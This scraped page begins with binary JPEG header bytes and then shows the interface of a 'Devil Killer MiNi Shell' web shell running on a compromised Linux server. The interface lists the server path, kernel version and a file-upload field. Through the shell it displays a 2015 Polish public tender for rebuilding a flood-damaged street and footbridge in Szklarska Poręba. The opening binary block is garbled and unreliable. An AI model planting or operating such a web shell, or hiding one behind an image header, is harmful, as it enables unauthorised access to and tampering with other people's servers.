JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150306/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150306/31935-N-2015.html

<p class="kh_header"><b>Szklarska Poręba: PRZEBUDOWA UL. SŁOWACKIEGO  W KM 0+000,00 DO 0+970,00
WRAZ Z PRZEBUDOWĄ KŁADKI NAD CIEKIEM WODNYM W ULICY SŁOWACKIEGO W SZKLARSKIEJ PORĘBIE,  USZKODZONEJ W TRAKCIE POWODZI 2013</b><br>
<b>Numer ogłoszenia: 31935 - 2015; data zamieszczenia: 06.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 75 7547700, faks 75 7547724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szklarskaporeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA UL. SŁOWACKIEGO  W KM 0+000,00 DO 0+970,00
WRAZ Z PRZEBUDOWĄ KŁADKI NAD CIEKIEM WODNYM W ULICY SŁOWACKIEGO W SZKLARSKIEJ PORĘBIE,  USZKODZONEJ W TRAKCIE POWODZI 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ( wg opisu technicznego z Dokumentacji )

1.	Przedmiotem zamówienia jest  przebudowa drogi  gminnej nr 115352 D  - ul. Słowackiego w Szklarskiej Porębie, na odcinku 0+000 km do 0+970 km  wraz z odbudową kładki nad ciekiem wodnym na ul. Słowackiego, uszkodzonych w trakcie powodzi 2013. Przebudowa  polega  na odtworzeniu  nawierzchni bitumicznej jezdni, nawierzchni chodników, wymianę barier ochronnych drogowych i barier U-11a  oraz odbudowę  kładki polegającej na wymianie konstrukcji kamienno-stalowo-drewnianej na konstrukcję żelbetową.   

1.1 Zakres rzeczowy robót:

1.1.1 DROGA
PRACE ROZBIÓRKOWE NA ISTNIEJĄCEJ DRODZE:
- frezowanie istniejącej nawierzchni - ok. 3 700m2
- roboty ziemne
- rozbiórka istniejących barier i balustrad
- rozbiórka krawężników 
- rozbiórka chodników 
PRACE MONTAŻOWE:
- odtworzenie podmurówki ogrodzeń
- wykonanie nadlewki żelbetowej na murze oporowym
- montaż paneli ogrodzeniowych wraz ze słupkami - ok. 165mb
- montaż  krawężników i obrzeży- ok. 570m
- wykonanie warstwy profilującej z kruszywa łamanego 0-31,5 mm stabilizowanego mechanicznie gr.10-20,0 cm,
- wykonanie warstwy wiążącej z betonu asfaltowego gr. 4 cm - ok. 4 152,4m2
- wykonanie warstwa ścieralnej betonu asfaltowego gr. 5 cm - ok. 4 152,4m2
- ułożenie nawierzchni z betonowej kostki brukowej gr. 8 cm - ok. 695m2 i  kamiennej kostki brukowej gr. 11 cm   - ok. 69m2
- wykonanie elementów odwodnienia
- montaż barier ochronnych - ok. 382mb
- prace związane z estetyką i profilowaniem skarp i rowów, w tym m.inn. ułożenie płyt ażurowych- ok. 492,7m2
- uzupełnienie ubytków w kamiennych murach oporowych
- uporządkowanie terenu budowy

1.1.2 KŁADKA
PRACE ROZBIÓRKOWE NA ISTNIEJĄCEJ KŁADZCE:
- rozbiórka istniejącej balustrady,
- roboty ziemne
- rozbiórka istniejącej uszkodzonej konstrukcji przęsła i części podpór
PRACE MONTAŻOWE:
- odbudowa części podporowych,
- wykonanie konstrukcji nośnej przęsła,
- montaż balustrad - ok. 10,1 mb
- wykonanie nawierzchni z żywicy poliuretanowych, gr. 5mm - ok. 37m2
- wykonanie nawierzchni dojazdów z tłucznia kamiennego oraz warstw bitumicznych,
- profilowanie skarp
- uporządkowanie terenu budowy

1.2  Parametry techniczne po wykonaniu robót:
     

1.2.1 DROGA
Na całym odcinku odbudowywanej drogi zaprojektowano frezowanie istniejącej nawierzchni bitumicznej, wykonanie warstwy profilującej z kruszywa łamanego stabilizowanego mechanicznie gr. 10-20 cm, warstwy wiążącej z betonu asfaltowego gr. 4 cm oraz warstwy ścieralnej z betonu asfaltowego gr. 5 cm. Warstwa profilująca z kruszywa łamanego stabilizowanego mechanicznie wraz z istniejącą podbudową powinna mieć grubość min. 20 cm. Jezdnia na odbudowywanym odcinku będzie jedno lub , zgodnie ze stanem istniejącym. Całkowita szerokość jezdni będzie zmienna od 3,0 m do 5,30 m. Spadek poprzeczny jezdni będzie na prostym odcinku drogi jednostronny o wielkości 2 %. Na łukach przewidziano spadek jednostronny o wielkości do 5,0%. Pochylenie podłużne jest dostosowane do istniejącej niwelety drogi. Odprowadzenie wody pozostanie bez zmian - do istniejących przydrożnych rowów zlokalizowanych w pasie drogowym, zaprojektowano jedynie odtworzenie zniszczonych ścieków skarpowych i profilowanie istniejących rowów. 
Na całym odcinku przewidziano wymianę istniejących zniszczonym krawężników na krawężniki betonowe 30x15 cm lub krawężniki najazdowe 22x15 cm. Założono także wymianę istniejących i zniszczonych barier na bariery ochronne stalowe. Zaprojektowano także odbudowę ogrodzeń poprzez wykonanie nowych podmurówek i montaż nowych paneli ogrodzeniowych wraz ze słupkami. W kamiennych murach oporowych przewidziano wykonanie uzupełnienia ubytków. Na chodnikach o szerokości 1,0 - 1,25 m przewidziano wykonanie nawierzchni z betonowej kostki brukowej gr. 8 cm. 
Na całej drodze w miejscach gdzie nie występują chodniki, zaprojektowano odtworzenie poboczy z kruszywa łamanego stabilizowanego mechanicznie o gr. 10 cm. 

Konstrukcja nawierzchni jezdni 
- warstwa ścieralna z betonu asfaltowego  gr. 5 cm,
- warstwa wiążąca z betonu asfaltowego  gr. 4 cm,
- frezowanie istniejącej nawierzchni bitumicznej
- warstwa profilująca z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie gr. 10-20,0 cm,
- istniejąca podbudowa grubości min. 10 cm
      - wykonanie nawierzchni z kamiennej kostki brukowej gr. 11 cm 

Konstrukcja nawierzchni chodników
- nawierzchnia z betonowej kostki brukowej gr. 8 cm 
- podsypka cementowo piaskowa  gr. 5 cm

1.2.2  KŁADKA
Istniejący obiekt to most drogowy o konstrukcji nośnej pomostu w postaci stalowych szyn kolejowych na który ułożona jest warstwa belek drewnianych stanowiących część użytkową kładki. Szyny oparte są prawdopodobnie tylko na kamiennych murkach stanowiących podpory kładki oraz równoległe i prostopadłe skrzydełka. 
Nie wyklucza się występowania dodatkowego fundamentu zlokalizowanego za kamiennymi murkami. Szerokość całkowita kładki ze skrzydełkami wynosi 4,76 m natomiast długość całkowita mierzona ze skrzydełkami wynosi ok 13,37 m. Na obiekcie zlokalizowana jest drewniana balustrada ze stalowymi słupkami. 

Parametry kładki po wykonaniu prac budowlanych.
Po wykonaniu prac budowlanych zasadnicze parametry takie jak długość i szerokość całkowita nie zmienia się           i nadal będą wynosić 13,37 m i 4,76 m,  zmianie ulegnie tylko część użytkowa obiektu. 
Wykonana zostanie żelbetowa płyta pomostowa szerokości 3,44 m i długości 5,45 m z betonu o gwarantowanej wytrzymałości minimum 30 MPa, posadowiona na żelbetowych ławach długości 3,47 m z betonu o gwarantowanej wytrzymałości minimum 30 MPa. Powierzchnia użytkowa kładki szerokości 3,0 m ograniczona będzie stalowymi balustradami zakotwionymi w żelbetowym pomoście. Nawierzchnia na kładce wykonana zostanie z nawierzchni cienko warstwowej z żywicy poliuretanowo epoksydowej. Na dojściach do obiektu projektuje się wykonanie nawierzchni z tłucznia kamiennego grubości 30 cm na geowłókninie oraz nawierzchni bitumicznej.

2.	Powyższy zakres ma charakter poglądowy. Szczegółowy opis przedmiotu zamówienia  zawarty jest w Części  III.  Specyfikacji Istotnych Warunków Zamówienia (SIWZ)   pn.  Opis przedmiotu zamówienia,  ogólnie zwanym Dokumentacją projektową..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.21.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości 20 000  PLN         (słownie złotych:  dwadzieścia tysięcy)
2. Wadium może być wniesione w następujących formach:
a)	 pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że    poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	  gwarancjach bankowych,
d)	  gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275,  z późniejszymi zmianami).
3.	W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona   zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego tj. Miasto Szklarska 
  Poręba ),  gwaranta ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib,
b)	 określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	 kwotę gwarancji,
d)	 termin ważności gwarancji,
e)  zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie   
      Zamawiającego zawierające oświadczenie :
   - że  wykonawca,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. lub  pełnomocnictw , a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie  lub
          -  że wykonawca ,  którego ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych w ofercie       lub
-nie wniósł zabezpieczenia należytego wykonania umowy                       lub
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

     Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i 2.e).

4.   Wadium w formie gwarancji  lub poręczeń  nie podlega  przeniesieniu na osoby trzecie.
5.  Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty  w  PLN : Bank Zachodni WBK S.A. 1 Oddział  w Szklarskiej Porębie -  nr 68 1090 1984 0000 0001 0081 6338 
      z adnotacją w tytule wpłaty :  Wadium - ul. Słowackiego
6.	Wadium wnoszone w innej, niż  pieniądz  dopuszczonej przez Zamawiającego formie _formach wykonawca wnosi do Zamawiającego  przy czym,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania u  Kierownika Referatu Inwestycji Miejskich i Gospodarki Komunalnej -  budynek  Urzędu Miasta Szklarska Poręba - II piętro  lub  innej, wskazanej  osoby w ww. Referacie, w godzinach od 07:30 do 15:00 od poniedziałku do piątku, z wyłączeniem sobót i dni ustawowo wolnych od pracy.
7.  Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie/formach wy0konawca może  również dołączyć do oferty - pod warunkiem,  że umieszczone zostanie w osobnej  kopercie  opisanej ( nazwa wykonawcy, adnotacja: Wadium - ul. Słowackiego), w sposób umożliwiający Zamawiającemu  zdeponowanie wadium           u wskazanej osoby, przed upływem terminu  otwarcia  ofert - bez konieczności naruszenia  koperty , w której znajduje się oferta. 
8.  Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym  warunkiem do stwierdzenia terminowego wniesienia wadium przez wykonawcę. 
9.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 upzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia wykazu  wykonanych robót budowlanych   w okresie ostatnich 5 lat przed upływem terminu  składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem ich rodzaju i wartości, daty i miejsca wykonania i załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone. 
         
        Decyzja, które roboty budowlane widniejące w ww. wykazie są najważniejsze, pozostawiona jest   Wykonawcy, z zastrzeżeniem treści zdania następnego.

         Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie       i wykazane w ww. wykazie realizacje, z których co najmniej trzy(3)  polegały na budowie, przebudowie lub remoncie dróg z wykonaniem podbudowy oraz nawierzchni bitumicznych.

        Każda z  realizacji uznanych przez Wykonawcę za najważniejszą oraz realizacji wykazanych na potwierdzenie spełnienia warunku udziału w postępowaniu  powinna być poparta załączonymi dowodami określającymi czy te roboty zostały wykonane w sposób należyty oraz wskazujących, czy  zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

         Dowodami są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym
charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. Wykonawca jest zobowiązany podać obiektywne przyczyny, jeżeli korzysta z tej drugiej formy dowodów.
Ww. dowody muszą być wydane przez podmiot na  rzecz, którego te roboty budowlane zostały wykonane. 
         W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wykonane wcześniej, Wykonawca nie ma obowiązku przedkładania ww. dowodów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności osobę odpowiedzialną za kierowanie robotami budowlanymi, tj.
                          Kierownika Budowy   posiadającego :
          -   co najmniej 36miesięczne doświadczenie zawodowe na stanowisku kierownika budowy, 
          - uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności        konstrukcyjno-budowlanej lub uprawnienia budowlane w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i obejmujące zakresem drogi. 
         Przez wymagany  minimalny okres  doświadczenia zawodowego  należy rozumieć łączną ilość przepracowanych miesięcy, liczonych od daty uzyskania uprawnień budowlanych do daty ukazania się Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 

Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania
samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.
Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie        i wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osoby odpowiedzialnej za kierowanie robotami budowlanymi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi  i zdolnością kredytową)  - w wysokości co najmniej  500 000  PLN;

b)	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej               z przedmiotem zamówienia na kwotę minimum   1 000 000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>- wykazanie  co najmniej trzech(3) realizacji, które    polegają na budowie, przebudowie lub remoncie dróg  z wykonaniem podbudowy oraz nawierzchni bitumicznych.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
